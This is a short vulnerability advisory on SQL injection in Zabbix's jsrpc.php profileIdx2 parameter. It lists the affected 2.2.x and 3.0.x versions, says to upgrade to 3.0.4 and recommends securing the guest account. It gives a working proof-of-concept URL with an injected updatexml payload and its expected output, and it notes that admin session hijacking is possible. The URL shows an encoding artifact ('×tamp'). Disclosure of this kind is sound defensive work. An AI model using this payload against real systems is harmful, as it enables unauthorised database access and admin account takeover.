How to Exploit and Patch Zabbix’s JSRPC ProfileIdx2 SQL Injection Vulnerability

Vulnerability Overview

Zabbix is an open‑source enterprise‑grade monitoring solution. A SQL injection flaw exists in the JSRPC profileIdx2 parameter, allowing unauthenticated attackers to execute arbitrary SQL and gain OS‑level access when the guest account is enabled (default empty password).

Impact Assessment

Attack cost: low

Severity: high

Authentication required: none

Affected versions: 2.2.x, 3.0.0‑3.0.3 (other versions untested)

Proof‑of‑Concept Exploit

Append the following URL to a reachable Zabbix instance (replace {HOST} with the target address):

http://{HOST}/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

The response contains the MD5 hash c4ca4238a0b923820dcc509a6f75849b, confirming the vulnerability.

Additional Exploitation Notes

Experienced attackers can craft error‑based SQL payloads to bypass password hashes or forge admin session IDs to hijack the admin account directly.

Mitigation

Upgrade Zabbix to version 3.0.4 or later, which includes the fix for this issue.

Security Recommendation

Monitoring systems protect critical assets; a compromised Zabbix instance can facilitate deeper network intrusion. Administrators should apply the patch promptly and disable or secure the guest account.

Reference

http://seclists.org/fulldisclosure/2016/Aug/82